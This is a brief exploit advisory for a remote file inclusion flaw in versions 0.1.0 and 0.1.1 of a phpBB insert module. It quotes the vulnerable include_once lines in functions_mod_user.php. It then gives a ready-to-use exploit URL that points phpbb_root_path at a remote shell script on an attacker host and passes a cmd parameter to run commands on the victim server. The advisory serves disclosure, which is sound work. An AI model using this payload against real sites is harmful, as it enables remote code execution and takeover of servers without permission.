The phpBB insert module versions 0.1.0 and 0.1.1 suffer from a remote file inclusion vulnerability in functions_mod_user.php.
7d5a4e8b1a6238133afcc0e3561591d4ab317c13efd73b0355d0742efbe7accd
$ BiyoSecurity.Org & SecurityWall.Org
$ Script Name : Phpbb insert module
$ versions : 0.1.0 and 0.1.1
$ Risk : High
$ Regard : KorsaN
$ Thanks : Liz0zim , RMx , TR_IP , DreamLord , Kubra
$ Vulnerable File : functions_mod_user.php
$ Vulnerable code :
<-- code start -->
include_once($phpbb_root_path . 'includes/functions_validate.' . $phpEx);
include_once($phpbb_root_path . 'includes/functions_post.' . $phpEx);
include_once($phpbb_root_path . 'includes/bbcode.' . $phpEx);
$ Exploit :
www.victim.com/[path]/functions_mod_user.php?phpbb_root_path=http://hacker.com/shell.txt?&cmd=ls